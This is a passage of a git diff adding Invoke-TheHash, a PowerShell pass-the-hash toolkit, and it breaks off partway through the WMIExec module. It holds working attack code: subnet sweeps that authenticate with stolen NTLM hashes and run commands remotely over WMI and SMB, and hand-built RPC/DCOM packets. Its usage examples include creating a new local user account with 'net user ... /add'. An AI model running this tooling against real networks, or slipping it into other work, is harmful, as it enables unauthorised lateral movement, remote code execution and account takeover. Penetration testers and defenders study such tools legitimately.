WMI or SMB port before attempting a full synchronous TCPClient connection. + +.PARAMETER PortCheckTimeout +Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. + +.PARAMETER Username +Username to use for authentication. + +.PARAMETER Domain +Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. + +.PARAMETER Hash +NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. + +.PARAMETER Command +Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. + +.PARAMETER CommandCOMSPEC +Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. + +.PARAMETER Service +Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. + +.PARAMETER SMB1 +(Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the +target. + +.PARAMETER Sleep +Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this +setting if you are experiencing strange results. + +.EXAMPLE +Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 + +.EXAMPLE +$target_output = Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 +$target_list = ConvertTo-TargetList $target_output +Invoke-TheHash -Type WMIExec -Targets $target_list -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose + +.LINK +https://github.com/Kevin-Robertson/Invoke-TheHash + +#> +[CmdletBinding()] +param +( + [parameter(Mandatory=$true)][Array]$Targets, + [parameter(Mandatory=$false)][Array]$TargetsExclude, + [parameter(Mandatory=$true)][String]$Username, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$Service, + [parameter(Mandatory=$false)][String]$Command, + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", + [parameter(Mandatory=$true)][ValidateSet("SMBExec","WMIExec")][String]$Type, + [parameter(Mandatory=$false)][Int]$PortCheckTimeout = 100, + [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, + [parameter(Mandatory=$false)][Switch]$PortCheckDisable, + [parameter(Mandatory=$false)][Int]$Sleep, + [parameter(Mandatory=$false)][Switch]$SMB1 +) + +$target_list = New-Object System.Collections.ArrayList +$target_list_singles = New-Object System.Collections.ArrayList +$target_list_subnets = New-Object System.Collections.ArrayList + +if($Type -eq 'WMIExec') +{ + $Sleep = 10 +} +else +{ + $Sleep = 150 +} + +# subnet parsing code borrowed heavily from Rich Lundeen's Invoke-Portscan +foreach($target in $Targets) +{ + + if($target.contains("/")) + { + $target_split = $target.split("/")[0] + [uint32]$subnet_mask_split = $target.split("/")[1] + + $target_address = [System.Net.IPAddress]::Parse($target_split) + + if($subnet_mask_split -ge $target_address.GetAddressBytes().Length * 8) + { + throw "Subnet mask is not valid" + } + + $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split)) + + $target_start_address = $target_address.GetAddressBytes() + [array]::Reverse($target_start_address) + + $target_start_address = [System.BitConverter]::ToUInt32($target_start_address,0) + [uint32]$target_subnet_mask_start = ([System.math]::Pow(2, $subnet_mask_split)-1) * ([System.Math]::Pow(2,(32 - $subnet_mask_split))) + $target_start_address = $target_start_address -band $target_subnet_mask_start + + $target_start_address = [System.BitConverter]::GetBytes($target_start_address)[0..3] + [array]::Reverse($target_start_address) + + $target_address = [System.Net.IPAddress] [byte[]] $target_start_address + + $target_list_subnets.Add($target_address.IPAddressToString) > $null + + for ($i=0; $i -lt $target_count-1; $i++) + { + $target_next = $target_address.GetAddressBytes() + [array]::Reverse($target_next) + $target_next = [System.BitConverter]::ToUInt32($target_next,0) + $target_next ++ + $target_next = [System.BitConverter]::GetBytes($target_next)[0..3] + [array]::Reverse($target_next) + + $target_address = [System.Net.IPAddress] [byte[]] $target_next + $target_list_subnets.Add($target_address.IPAddressToString) > $null + } + + $target_list_subnets.RemoveAt(0) + $target_list_subnets.RemoveAt($target_list_subnets.Count - 1) + + } + else + { + $target_list_singles.Add($target) > $null + } + +} + +$target_list.AddRange($target_list_singles) +$target_list.AddRange($target_list_subnets) + +foreach($target in $TargetsExclude) +{ + $target_list.Remove("$Target") +} + +foreach($target in $target_list) +{ + + if($type -eq 'WMIExec') + { + + if(!$PortCheckDisable) + { + $WMI_port_test = New-Object System.Net.Sockets.TCPClient + $WMI_port_test_result = $WMI_port_test.BeginConnect($target,"135",$null,$null) + $WMI_port_test_success = $WMI_port_test_result.AsyncWaitHandle.WaitOne($PortCheckTimeout,$false) + $WMI_port_test.Close() + } + + if($WMI_port_test_success -or $PortCheckDisable) + { + Invoke-WMIExec -username $Username -domain $Domain -hash $Hash -command $Command -target $target -sleep $Sleep + } + + } + elseif($Type -eq 'SMBExec') + { + + if(!$PortCheckDisable) + { + $SMB_port_test = New-Object System.Net.Sockets.TCPClient + $SMB_port_test_result = $SMB_port_test.BeginConnect($target,"445",$null,$null) + $SMB_port_test_success = $SMB_port_test_result.AsyncWaitHandle.WaitOne($PortCheckTimeout,$false) + $SMB_port_test.Close() + } + + if($SMB_port_test_success -or $PortCheckDisable) + { + Invoke-SMBExec -username $Username -domain $Domain -hash $Hash -command $Command -CommandCOMSPEC $CommandCOMSPEC -Service $Service -target $target -smb1:$smb1 -sleep $Sleep + } + + } + +} + +} + +function ConvertTo-TargetList +{ +<# +.SYNOPSIS +ConvertTo-TargetList converts an Invoke-TheHash output array to an array that contains only targets discovered to +have Invoke-WMIExec or Invoke-SMBExec access. The output of this function can be passed back into Invoke-TheHash +through the Targets parameter. + +.PARAMETER $OutputArray +The output array returned by Invoke-TheHash. + +.EXAMPLE +$target_output = Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 +$target_list = ConvertTo-TargetList $target_output +Invoke-TheHash -Type WMIExec -Targets $target_list -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose + +.LINK +https://github.com/Kevin-Robertson/Invoke-TheHash + +#> + +[CmdletBinding()] +param ([parameter(Mandatory=$true)][Array]$Invoke_TheHash_Output) + +$target_list = New-Object System.Collections.ArrayList + +foreach($target in $ITHOutput) +{ + + if($target -like "* on *" -and $target -notlike "* denied *" -and $target -notlike "* failed *" -and $target -notlike "* is not *") + { + $target_index = $target.IndexOf(" on ") + $target_index += 4 + $target = $target.SubString($target_index,($target.Length - $target_index)) + $target_list.Add($target) > $null + } + +} + +return $target_list +} diff --git a/Invoke-TheHash.psd1 b/Invoke-TheHash.psd1 Binary files differnew file mode 100644 index 0000000..5c33472 --- /dev/null +++ b/Invoke-TheHash.psd1 diff --git a/Invoke-TheHash.psm1 b/Invoke-TheHash.psm1 new file mode 100644 index 0000000..b70510b --- /dev/null +++ b/Invoke-TheHash.psm1 @@ -0,0 +1,10 @@ +<# +.SYNOPSIS +Invoke-TheHash - PowerShell Pass The Hash Utils + +.LINK +https://github.com/Kevin-Robertson/Invoke-TheHash +#> +Import-Module $PWD\Invoke-TheHash.ps1 +Import-Module $PWD\Invoke-SMBExec.ps1 +Import-Module $PWD\Invoke-WMIExec.ps1
\ No newline at end of file diff --git a/Invoke-WMIExec.ps1 b/Invoke-WMIExec.ps1 new file mode 100644 index 0000000..ec14080 --- /dev/null +++ b/Invoke-WMIExec.ps1 @@ -0,0 +1,1431 @@ +function Invoke-WMIExec +{ +<# +.SYNOPSIS +Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. + +.PARAMETER Target +Hostname or IP address of target. + +.PARAMETER Username +Username to use for authentication. + +.PARAMETER Domain +Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after +the username. + +.PARAMETER Hash +NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. + +.PARAMETER Command +Command to execute on the target. If a command is not specified, the function will just check to see if the +username and hash has access to WMI on the target. + +.PARAMETER Sleep +Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this +setting if you are experiencing strange results. + +.EXAMPLE +Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose + +.EXAMPLE +Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "cmd.exe /c net user WMIExec Winter2017 /add" + +.EXAMPLE +Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 + +.LINK +https://github.com/Kevin-Robertson/Invoke-TheHash + +#> +[CmdletBinding()] +param +( + [parameter(Mandatory=$true)][String]$Target, + [parameter(Mandatory=$true)][String]$Username, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$Command, + [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, + [parameter(Mandatory=$false)][Int]$Sleep=10 +) + +if($Command) +{ + $WMI_execute = $true +} + +function ConvertFrom-PacketOrderedDictionary +{ + param($packet_ordered_dictionary) + + ForEach($field in $packet_ordered_dictionary.Values) + { + $byte_array += $field + } + + return $byte_array +} + +#RPC + +function Get-PacketRPCBind() +{ + param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) + + [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) + + $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary + $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05)) + $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b)) + $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03)) + $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00)) + $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes) + $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10)) + $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10)) + $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items) + $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID) + $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID) + $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) + + if($packet_num_ctx_items[0] -eq 2) + { + $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) + $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) + $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) + } + elseif($packet_num_ctx_items[0] -eq 3) + { + $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) + $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00)) + $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) + $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04)) + $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) + $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) + } + + if($packet_call_ID -eq 3) + { + $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) + $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02)) + $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) + $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) + } + + return $packet_RPCBind +} + +function Get-PacketRPCAUTH3() +{ + param([Byte[]]$packet_NTLMSSP) + + [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length) + $packet_NTLMSSP_length = $packet_NTLMSSP_length[0,1] + [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28) + $packet_RPC_length = $packet_RPC_length[0,1] + + $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary + $packet_RPCAuth3.Add("RPCAUTH3_Version",[Byte[]](0x05)) + $packet_RPCAuth3.Add("RPCAUTH3_VersionMinor",[Byte[]](0x00)) + $packet_RPCAuth3.Add("RPCAUTH3_PacketType",[Byte[]](0x10)) + $packet_RPCAuth3.Add("RPCAUTH3_PacketFlags",[Byte[]](0x03)) + $packet_RPCAuth3.Add("RPCAUTH3_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_RPCAuth3.Add("RPCAUTH3_FragLength",$packet_RPC_length) + $packet_RPCAuth3.Add("RPCAUTH3_AuthLength",$packet_NTLMSSP_length) + $packet_RPCAuth3.Add("RPCAUTH3_CallID",[Byte[]](0x03,0x00,0x00,0x00)) + $packet_RPCAuth3.Add("RPCAUTH3_MaxXmitFrag",[Byte[]](0xd0,0x16)) + $packet_RPCAuth3.Add("RPCAUTH3_MaxRecvFrag",[Byte[]](0xd0,0x16)) + $packet_RPCAuth3.Add("RPCAUTH3_AuthType",[Byte[]](0x0a)) + $packet_RPCAuth3.Add("RPCAUTH3_AuthLevel",[Byte[]](0x02)) + $packet_RPCAuth3.Add("RPCAUTH3_AuthPadLength",[Byte[]](0x00)) + $packet_RPCAuth3.Add("RPCAUTH3_AuthReserved",[Byte[]](0x00)) + $packet_RPCAuth3.Add("RPCAUTH3_ContextID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCAuth3.Add("RPCAUTH3_NTLMSSP",$packet_NTLMSSP) + + return $packet_RPCAuth3 +} + +function Get-PacketRPCRequest() +{ + param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_object_UUID) + + if($packet_auth_length -gt 0) + { + $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 + } + + [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_object_UUID.Length) + [Byte[]]$packet_frag_length = $packet_write_length[0,1] + [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length) + [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length) + $packet_auth_length = $packet_auth_length[0,1] + + $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05)) + $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00)) + $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00)) + $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags) + $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length) + $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length) + $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID) + $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint) + $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID) + $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum) + + if($packet_object_UUID.Length) + { + $packet_RPCRequest.Add("RPCRequest_ObjectUUID",$packet_object_UUID) + } + + return $packet_RPCRequest +} + +function Get-PacketRPCAlterContext() +{ + param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) + + $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary + $packet_RPCAlterContext.Add("RPCAlterContext_Version",[Byte[]](0x05)) + $packet_RPCAlterContext.Add("RPCAlterContext_VersionMinor",[Byte[]](0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_PacketType",[Byte[]](0x0e)) + $packet_RPCAlterContext.Add("RPCAlterContext_PacketFlags",[Byte[]](0x03)) + $packet_RPCAlterContext.Add("RPCAlterContext_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_FragLength",[Byte[]](0x48,0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_AuthLength",[Byte[]](0x00,0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_CallID",$packet_call_ID) + $packet_RPCAlterContext.Add("RPCAlterContext_MaxXmitFrag",[Byte[]](0xd0,0x16)) + $packet_RPCAlterContext.Add("RPCAlterContext_MaxRecvFrag",[Byte[]](0xd0,0x16)) + $packet_RPCAlterContext.Add("RPCAlterContext_AssocGroup",$packet_assoc_group) + $packet_RPCAlterContext.Add("RPCAlterContext_NumCtxItems",[Byte[]](0x01)) + $packet_RPCAlterContext.Add("RPCAlterContext_Unknown",[Byte[]](0x00,0x00,0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_ContextID",$packet_context_ID) + $packet_RPCAlterContext.Add("RPCAlterContext_NumTransItems",[Byte[]](0x01)) + $packet_RPCAlterContext.Add("RPCAlterContext_Unknown2",[Byte[]](0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_Interface",$packet_interface_UUID) + $packet_RPCAlterContext.Add("RPCAlterContext_InterfaceVer",[Byte[]](0x00,0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_InterfaceVerMinor",[Byte[]](0x00,0x00)) + $packet_RPCAlterContext.Add("RPCAlterContext_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) + $packet_RPCAlterContext.Add("RPCAlterContext_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) + + return $packet_RPCAlterContext +} + +function Get-PacketNTLMSSPVerifier() +{ + param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) + + $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary + + if($packet_auth_padding -eq 4) + { + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) + [Byte[]]$packet_auth_pad_length = 0x04 + } + elseif($packet_auth_padding -eq 8) + { + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + [Byte[]]$packet_auth_pad_length = 0x08 + } + elseif($packet_auth_padding -eq 12) + { + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + [Byte[]]$packet_auth_pad_length = 0x0c + } + else + { + [Byte[]]$packet_auth_pad_length = 0x00 + } + + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthType",[Byte[]](0x0a)) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthLevel",$packet_auth_level) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadLen",$packet_auth_pad_length) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthReserved",[Byte[]](0x00)) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierSequenceNumber",$packet_sequence_number) + + return $packet_NTLMSSPVerifier +} + +function Get-PacketDCOMRemQueryInterface() +{ + param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) + + $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_VersionMajor",[Byte[]](0x05,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_VersionMinor",[Byte[]](0x07,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Flags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Reserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_CausalityID",$packet_causality_ID) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IPID",$packet_IPID) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Refs",[Byte[]](0x05,0x00,0x00,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IIDs",[Byte[]](0x01,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) + $packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IID",$packet_IID) + + return $packet_DCOMRemQueryInterface +} + +function Get-PacketDCOMRemRelease() +{ + param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) + + $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary + $packet_DCOMRemRelease.Add("DCOMRemRelease_VersionMajor",[Byte[]](0x05,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_VersionMinor",[Byte[]](0x07,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_Flags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_Reserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_CausalityID",$packet_causality_ID) + $packet_DCOMRemRelease.Add("DCOMRemRelease_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_Unknown",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_InterfaceRefs",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_IPID",$packet_IPID) + $packet_DCOMRemRelease.Add("DCOMRemRelease_PublicRefs",[Byte[]](0x05,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_PrivateRefs",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_IPID2",$packet_IPID2) + $packet_DCOMRemRelease.Add("DCOMRemRelease_PublicRefs2",[Byte[]](0x05,0x00,0x00,0x00)) + $packet_DCOMRemRelease.Add("DCOMRemRelease_PrivateRefs2",[Byte[]](0x00,0x00,0x00,0x00)) + + return $packet_DCOMRemRelease +} + +function Get-PacketDCOMRemoteCreateInstance() +{ + param([Byte[]]$packet_causality_ID,[String]$packet_target) + + [Byte[]]$packet_target_unicode = [System.Text.Encoding]::Unicode.GetBytes($packet_target) + [Byte[]]$packet_target_length = [System.BitConverter]::GetBytes($packet_target.Length + 1) + $packet_target_unicode += ,0x00 * (([Math]::Truncate($packet_target_unicode.Length / 8 + 1) * 8) - $packet_target_unicode.Length) + [Byte[]]$packet_cntdata = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 720) + [Byte[]]$packet_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 680) + [Byte[]]$packet_total_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 664) + [Byte[]]$packet_private_header = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 40) + 0x00,0x00,0x00,0x00 + [Byte[]]$packet_property_data_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 56) + + $packet_DCOMRemoteCreateInstance = New-Object System.Collections.Specialized.OrderedDictionary + 